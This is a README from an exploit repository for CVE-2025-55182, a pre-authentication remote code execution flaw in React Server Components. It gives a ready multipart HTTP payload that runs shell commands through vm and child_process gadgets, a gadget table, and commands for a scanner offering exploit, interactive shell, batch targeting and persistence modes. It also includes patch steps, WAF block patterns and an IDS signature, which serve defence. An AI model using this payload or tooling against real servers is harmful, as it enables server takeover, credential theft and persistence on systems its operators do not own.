## https://sploitus.com/exploit?id=AB519A0B-3FF8-5203-90BA-1B3A04DADC4D
# CVE-2025-55182: Critical Pre-Authentication RCE in React Server Components
Security Research by schema.cx
"Control is an illusion. It's the systems we build that control usβunless we understand them first."
---
## π Table of Contents
- [Disclaimer & Legal Notice](#-disclaimer--legal-notice)
- [Executive Summary](#-executive-summary)
- [Technical Description](#-technical-description)
- [Affected Systems](#-affected-systems)
- [Proof of Concept](#-proof-of-concept)
- [Impact Assessment](#-impact-assessment)
- [Mitigation & Remediation](#-mitigation--remediation)
- [Responsible Disclosure Timeline](#-responsible-disclosure-timeline)
- [References](#-references)
- [Attribution](#-attribution)
---
## β οΈ Disclaimer & Legal Notice
> **THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY**
**STOP. READ THIS BEFORE PROCEEDING.**
This repository contains proof-of-concept code for a critical security vulnerability. By accessing, downloading, or using any materials in this repository, you acknowledge and agree to the following:
### Legal Requirements
1. **Written Authorization Required**: You MUST have explicit, written permission from the system owner before conducting any security testing. Verbal agreements are insufficient.
2. **Scope Limitations**: Testing must be confined to systems explicitly listed in your authorization. "Scope creep" is not permitted.
3. **Applicable Laws**: Unauthorized access to computer systems violates:
- **United States**: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. Β§ 1030
- **European Union**: Directive 2013/40/EU on attacks against information systems
- **United Kingdom**: Computer Misuse Act 1990
- **Australia**: Criminal Code Act 1995, Division 477-478
- **Other jurisdictions**: Similar computer crime laws apply globally
### Liability Disclaimer
**THE AUTHORS AND CONTRIBUTORS OF THIS REPOSITORY:**
- Accept NO responsibility for misuse of this tool
- Provide NO warranty, express or implied
- Are NOT liable for any damages arising from use or inability to use this software
- Do NOT endorse illegal activities of any kind
### Ethical Guidelines
- **Never test without permission** β even if you "just want to check"
- **Document everything** β maintain detailed logs of all testing activities
- **Minimize impact** β use the least invasive methods possible
- **Report responsibly** β follow coordinated disclosure practices
- **Respect privacy** β do not exfiltrate or retain sensitive data
> *"The question isn't whether we can exploit the vulnerability. It's whether we should, and for what purpose."*
---
## π Executive Summary
**CVE-2025-55182** is a **critical pre-authentication remote code execution (RCE)** vulnerability affecting React Server Components in React 19.x and Next.js 15.x-16.x applications.
### Business Impact
This vulnerability allows **any unauthenticated attacker** with network access to a vulnerable application to execute arbitrary commands on the server. The attack requires no credentials, no user interaction, and can be fully automated. Successful exploitation leads to:
- **Complete server compromise** β attackers gain full control of the underlying system
- **Data breach potential** β access to databases, environment variables, secrets, and user data
- **Lateral movement** β compromised servers can be used to attack internal networks
- **Supply chain risk** β production systems serving millions of users may be affected
### Severity Rating
| Metric | Rating |
|--------|--------|
| **CVSS v3.1 Base Score** | **10.0 CRITICAL** |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | None |
| **Impact (C/I/A)** | High / High / High |
> *"People trust systems because they don't understand them. That trust is a vulnerability."*
---
## π¬ Technical Description
### Root Cause Analysis
The vulnerability exists in React's Flight protocol implementation within the `requireModule` function. This function uses **bracket notation** to access module exports based on user-controlled input, without validating that the requested property is an **own property** of the module.
**Vulnerable Code Location:**
```
react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js
Function: requireModule (approximately line 2546-2558 in v19.0.0)
```
**Vulnerable Pattern:**
```javascript
function requireModule(metadata) {
var moduleExports = __webpack_require__(metadata[0]);
// ... async handling ...
return moduleExports[metadata[2]]; // β VULNERABLE: No hasOwnProperty check
}
```
### Exploitation Mechanism
The attack leverages JavaScript's **prototype chain traversal**:
1. **Entry Point**: Attacker sends a malicious multipart form request to a Server Action endpoint
2. **Payload Injection**: The `$ACTION_0:0` field contains JSON with attacker-controlled `id` (module#export format) and `bound` (arguments) properties
3. **Prototype Access**: By specifying exports like `constructor` or accessing prototype properties, attackers can reference built-in Node.js modules
4. **RCE Gadgets**: Functions like `vm.runInThisContext`, `child_process.execSync`, or `fs.readFileSync` execute with attacker-supplied arguments
### Attack Vector
```
HTTP POST /formaction
β
decodeAction(formData, serverManifest)
β
loadServerReference(manifest, value.id, value.bound)
β
resolveServerReference(config, id) // Parses "module#export" format
β
requireModule(metadata)
β
moduleExports[metadata[2]] // Prototype chain access β RCE
```
### Payload Structure
```http
POST /api/action HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary
------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"vm#runInThisContext","bound":["require('child_process').execSync('whoami').toString()"]}
------Boundary--
```
### Available RCE Gadgets
| Gadget | Module | Description | Impact |
|--------|--------|-------------|--------|
| `vm#runInThisContext` | vm | Execute JS in current context | **Direct RCE** |
| `vm#runInNewContext` | vm | Execute JS in sandbox (escapable) | **Direct RCE** |
| `child_process#execSync` | child_process | Execute shell commands | **Direct RCE** |
| `child_process#spawnSync` | child_process | Spawn processes | **Direct RCE** |
| `fs#readFileSync` | fs | Read arbitrary files | **Data Exfiltration** |
| `fs#writeFileSync` | fs | Write arbitrary files | **Persistence/Backdoor** |
| `module#_load` | module | Load JS modules (2-step RCE) | **Indirect RCE** |
> *"Every system has a door. The question is whether you built the lock yourselfβor inherited it from someone who never expected visitors."*
---
## π― Affected Systems
### Vulnerable Versions
| Product | Vulnerable Versions | Patched Versions |
|---------|---------------------|------------------|
| **React** | 19.0.0, 19.1.0, 19.1.1, 19.2.0 | 19.0.1+, 19.1.2+, 19.2.1+ |
| **Next.js** | 15.x, 16.x (using vulnerable React) | Versions with patched React |
### Prerequisites for Exploitation
1. **React Server Components Enabled**: Application uses RSC with Server Actions
2. **Vulnerable React Version**: One of the affected versions is in use
3. **Network Access**: Attacker can reach Server Action endpoints
4. **Dangerous Modules in Bundle**: For direct RCE, modules like `vm`, `child_process`, or `fs` must be in the webpack bundle
### Platform Requirements
- **Runtime**: Node.js (any version supporting React 19)
- **Framework**: Next.js App Router or custom RSC implementation
- **No additional configuration** required to be vulnerable
### Likelihood of Dangerous Modules
| Module | Likelihood in Bundle | Common Sources |
|--------|---------------------|----------------|
| `fs` | **Very High** | fs-extra, gray-matter, multer, sharp, chokidar |
| `child_process` | **Medium-High** | execa, shelljs, puppeteer, sharp, pdf generators |
| `vm` | **Low-Medium** | ejs, pug, template engines |
| `module` | **Very Low** | tsx, ts-node (usually CLI-only) |
---
## π§ Proof of Concept
### Scanner Tool
This repository includes a comprehensive Python-based security scanner with multiple operation modes.
### Repository Structure
```
CVE-2025-55182-poc/
βββ README.md # This file
βββ scanner/
β βββ __init__.py # Python package init
β βββ scanner.py # Main unified scanner (6 modes)
β βββ readme.md # Detailed scanner documentation
β βββ requirements.txt # Python dependencies
β βββ docs/
β βββ TECHNICAL-ANALYSIS.md # Deep dive into vulnerability
β βββ VULNERABLE-PACKAGES.md # Affected package versions
```
**Installation:**
```bash
cd scanner
pip install -r requirements.txt
```
### Basic Usage Examples
**Vulnerability Scan:**
```bash
# Check if target is vulnerable
python scanner.py scan https://target.com
```
**Gadget Detection:**
```bash
# Identify available RCE gadgets
python scanner.py exploit https://target.com --detect-gadgets
```
**Command Execution (with authorization):**
```bash
# Execute command on vulnerable target
python scanner.py exploit https://target.com -c "whoami"
```
**Batch Testing:**
```bash
# Test multiple targets from file
python scanner.py batch -f targets.txt -o results.json
```
**Automated Scanning with Verification:**
```bash
# Comprehensive scan with exploit verification
python scanner.py auto -f targets.txt -o report.txt
```
### Expected Output
**Vulnerable Target:**
```
[+] VULNERABLE to CVE-2025-55182!
Framework: Next.js
Version: 15.1.0
Confidence: HIGH
Available Gadgets:
β vm#runInThisContext
β child_process#execSync
β fs#readFileSync
β fs#writeFileSync
```
**Patched Target:**
```
[-] Not vulnerable or unable to determine
Framework detected: Next.js
Version: 15.2.0 (patched)
```
### Scanner Modes
| Mode | Purpose |
|------|---------|
| `scan` | Vulnerability detection and fingerprinting |
| `exploit` | Controlled exploitation with specific gadgets |
| `shell` | Interactive command shell on vulnerable targets |
| `batch` | Test multiple URLs with statistics |
| `auto` | Automated multi-target scanning with verification |
| `persist` | Persistence attack demonstrations (SSH keys, creds) |
### Features
- **Framework Detection**: Identifies Next.js/React applications before exploitation
- **WAF/CDN Detection**: Recognizes Cloudflare, Akamai, Incapsula, AWS WAF, Azure WAF, and more
- **Multiple RCE Gadgets**: vm, child_process, fs, module exploitation paths
- **Two-Step RCE**: Alternative exploitation via fs#writeFileSync + module#_load
- **Verification**: Confirms exploits with proof-of-execution
- **False Positive Prevention**: Smart filtering of HTML/WAF responses
- **Reporting**: Text, JSON, and HTML output formats
For complete documentation, see [scanner/readme.md](scanner/readme.md).
> *"A tool is only as dangerous as the intent behind it. In the right hands, a weapon becomes a shield."*
---
## π₯ Impact Assessment
### Confidentiality Impact: **HIGH**
- **Environment Variables**: Database credentials, API keys, secrets
- **Source Code**: Application logic, proprietary algorithms
- **User Data**: Personal information, authentication tokens
- **System Files**: `/etc/passwd`, SSH keys, cloud credentials
- **Internal Networks**: Pivot point for further attacks
### Integrity Impact: **HIGH**
- **Code Injection**: Backdoors in application files
- **Data Manipulation**: Database modifications
- **Configuration Changes**: Security settings, access controls
- **Persistence Mechanisms**: Cron jobs, startup scripts, SSH keys
### Availability Impact: **HIGH**
- **Service Disruption**: Process termination, resource exhaustion
- **Data Destruction**: File deletion, database drops
- **Ransomware Deployment**: Encryption of critical files
- **Complete System Compromise**: Full administrative control
### Attack Scenarios
1. **Data Breach**: Attacker reads `.env` files containing database credentials, exfiltrates customer data
2. **Cryptominer Installation**: Attacker writes mining script, adds cron job for persistence
3. **Supply Chain Attack**: Attacker modifies source code in production, serving malicious content to users
4. **Lateral Movement**: Compromised server used to attack internal databases, APIs, and services
5. **Ransomware**: Attacker encrypts application files, demands payment for decryption keys
---
## π‘οΈ Mitigation & Remediation
### Immediate Actions (Do Now)
1. **Upgrade React Immediately**
```bash
npm update react react-dom react-server-dom-webpack
```
Target versions: 19.0.1+, 19.1.2+, or 19.2.1+
2. **Verify Patch Application**
```bash
npm ls react
```
Ensure no vulnerable versions remain in your dependency tree
### WAF/Firewall Rules
Block requests containing these patterns:
```
# Request body patterns to block
#constructor
#__proto__
#prototype
vm#runInThisContext
vm#runInNewContext
child_process#execSync
child_process#execFileSync
child_process#spawnSync
module#_load
fs#readFileSync
fs#writeFileSync
```
### Next.js Configuration Hardening
Exclude dangerous packages from webpack bundling:
```javascript
// next.config.js
module.exports = {
serverExternalPackages: [
'sharp',
'puppeteer',
'execa',
'shelljs',
'vm2'
]
}
```
### Detection & Monitoring
**Log Patterns to Monitor:**
- Unusual `$ACTION_REF_` or `$ACTION_ID_` fields in request bodies
- POST requests to `/api/*` endpoints with multipart form data containing JSON
- Error messages referencing `constructor`, `prototype`, or unexpected module access
**Intrusion Detection Signatures:**
```
alert http any any -> $HOME_NET any (
msg:"CVE-2025-55182 Exploit Attempt";
content:"$ACTION_";
content:"#constructor"; distance:0;
sid:2025551820; rev:1;
)
```
### Long-Term Recommendations
1. **Dependency Auditing**: Regular scans with `npm audit`, Snyk, or similar tools
2. **Security Updates**: Automated dependency updates via Dependabot or Renovate
3. **Input Validation**: Never trust user input in property access patterns
4. **Least Privilege**: Run applications with minimal necessary permissions
5. **Network Segmentation**: Isolate production systems from internal networks
> *"Patching isn't just about fixing what's broken. It's about closing the doors you didn't know were open."*
---
## π Responsible Disclosure Timeline
| Date | Event |
|------|-------|
| **Discovery** | Information pending |
| **Vendor Notification** | Information pending |
| **Vendor Acknowledgment** | Information pending |
| **Patch Development** | Information pending |
| **Patch Release** | React 19.0.1, 19.1.2, 19.2.1 |
| **Public Disclosure** | Information pending |
| **CVE Assignment** | CVE-2025-55182 |
This disclosure follows [CERT/CC Vulnerability Disclosure Guidelines](https://vuls.cert.org/confluence/display/CVD) and [ISO/IEC 29147:2018](https://www.iso.org/standard/72311.html) standards for coordinated vulnerability disclosure.
---
## π References
### Official Resources
- **CVE Entry**: [https://vulners.com/cve/CVE-2025-55182](https://vulners.com/cve/CVE-2025-55182)
- **NVD Entry**: [https://nvd.nist.gov/vuln/detail/CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
### Vendor Advisories
- **React Security Advisories**: [https://github.com/facebook/react/security/advisories](https://github.com/facebook/react/security/advisories)
- **Next.js Security**: [https://nextjs.org/docs/security](https://nextjs.org/docs/security)
### Related Research
- [Technical Analysis (Deep Dive)](scanner/docs/TECHNICAL-ANALYSIS.md)
- [Vulnerable Package Analysis](scanner/docs/VULNERABLE-PACKAGES.md)
### Background Reading
- [OWASP - Prototype Pollution](https://owasp.org/www-community/vulnerabilities/Prototype_pollution)
- [Node.js VM Module Security](https://nodejs.org/api/vm.html#vm-executing-javascript)
- [React Server Components RFC](https://github.com/reactjs/rfcs/blob/main/text/0188-server-components.md)
---
## π Attribution
### Original Research
This proof-of-concept was developed by the security research team at **[schema.cx](https://schema.cx)**.
**Repository**: [https://github.com/ejpir/CVE-2025-55182-poc](https://github.com/ejpir/CVE-2025-55182-poc)
### Acknowledgments
We would like to thank:
- The React and Next.js security teams for their rapid response
- The security research community for collaborative analysis
- MITRE for CVE coordination
---
## π License
This project is released for **educational and authorized security research purposes only**.
By using this software, you agree to:
1. Use it only on systems you own or have explicit authorization to test
2. Follow responsible disclosure practices
3. Not use it for malicious purposes
4. Accept all responsibility for your actions
---
"We don't hack to destroy. We hack to understand. And understanding is the first step to building something better."
schema.cx β Security Research for a Safer Digital World